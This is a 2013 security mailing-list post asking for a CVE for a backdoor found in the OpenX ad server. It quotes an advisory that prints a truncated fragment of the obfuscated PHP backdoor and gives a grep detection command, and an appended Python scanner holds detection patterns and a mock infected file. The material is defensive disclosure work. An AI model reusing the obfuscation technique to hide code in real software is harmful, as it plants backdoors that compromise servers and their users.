Date: Tue, 06 Aug 2013 17:52:06 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: Open Source Security <oss-security@...ts.openwall.com>,
        Assign a CVE Identifier <cve-assign@...re.org>,
        "Steven M. Christey" <coley@...re.org>
Subject: OpenX Ad Server Backdoor CVE?

I assume this needs a CVE? Mitre, have you guys seen a request for one?

https://isc.sans.edu/diary/OpenX+Ad+Server+Backdoor/16303

According to a post by Heise Security, a backdoor has been spotted in
the popular open source ad software OpenX [1][2]. Apparently the
backdoor has been present since at least November 2012. I tried to
download the source to verify the information, but it appears the
files have been removed.

The backdoor is disguised as php code that appears to create a jQuery
javascript snippet:

this.each(function(){l=flashembed(this,k,j)}<!--?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2';
*/$j='ex'./**/'plode'; /* if(this.className ...

Heise recommends searching the ".js" files of OpenX for php code to
find out if your version of OpenX is the backdoored version.

find . -name \*.js -exec grep -l '<?php' {} \;

The backdoor can then be used by an attacker to upload a shell to
www/images/debugs.php . We have seen in the past several web sites
that delivered malicious ads served by compromised ad servers. This
could be the reason for some of these compromises.

If you run OpenX:

- verify the above information (and let us know)
- if you can find the backdoor, disable/uninstall OpenX
- make sure you remove the "debug.php" file
- best: rebuild the server if you can

Heise investigated a version 2.8.10 of OpenX with a date of December
9th and an md5 of 6b3459f16238aa717f379565650cb0cf for the
openXVideoAds.zip file.

[1] http://www.heise.de/newsticker/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html
(only in German at this point)
[2] http://www.openx.com

-- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
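The find/grep one-liner in the message is the detection step the ISC diary gives. As an added example (not code from the diary, Heise or the OpenX project), the Python scanner below generalizes it: it walks an install tree, flags .js files that contain a PHP open tag (either the plain form or the "<!--?php" form in the quoted snippet) or the comment-split string concatenation seen in it, checks for the dropped file under both spellings used above (debugs.php and debug.php), and compares openXVideoAds.zip against the MD5 Heise reported. The sample tree it builds is constructed, with a snippet modelled on the quoted one; the filenames under it are assumptions.

```python
import hashlib
import os
import re
import tempfile

# Indicators taken from the advisory text: PHP in .js files, the comment-split concat, shell path, zip MD5.
INDICATORS = {
    "php-tag": re.compile(r"<(?:!--)?\?php", re.IGNORECASE),  # '<?php' or the '<!--?php' form shown
    "split-string-concat": re.compile(r"'\w+'\s*\.\s*/\*\*/\s*'\w+'"),  # e.g. 'ex'./**/'plode'
}
SHELL_PATHS = ("www/images/debugs.php", "www/images/debug.php")  # both spellings appear above
KNOWN_BAD_ZIP_MD5 = "6b3459f16238aa717f379565650cb0cf"  # openXVideoAds.zip, per Heise

def scan_js_file(path):
    with open(path, "rb") as f:
        text = f.read().decode("latin-1")  # tolerate arbitrary bytes in minified JS
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_openx_install(root):
    """Walk an OpenX tree; map each suspicious relative path to the indicators it hit."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name.endswith(".js"):
                hits = scan_js_file(full)
                if hits:
                    findings[rel] = hits
            elif name == "openXVideoAds.zip":
                with open(full, "rb") as f:
                    if hashlib.md5(f.read()).hexdigest() == KNOWN_BAD_ZIP_MD5:
                        findings[rel] = ["known-bad-md5"]
    for rel in SHELL_PATHS:
        if os.path.isfile(os.path.join(root, rel)):
            findings[rel] = ["dropped-shell-present"]
    return findings

def _put(root, rel, text):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(text)

def build_fixture():
    """Constructed sample tree (filenames assumed): a clean .js, one modelled on the snippet, a dropped file."""
    root = tempfile.mkdtemp(prefix="openx-scan-")
    _put(root, "www/js/clean.js", "jQuery.tools = jQuery.tools || {version: {}};\n")
    _put(root, "www/js/player.js", "this.each(function(){l=flashembed(this,k,j)}"
         "<?php /*if(e)*/ $j='ex'./**/'plode'; /* ... */ ?>\n")
    _put(root, "www/images/debugs.php", "<?php /* constructed stand-in for a dropped file */ ?>\n")
    return root
```

Run scan_openx_install() against the document root of a real install; any non-empty result is worth a closer look, and an empty one only says these particular indicators were absent.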
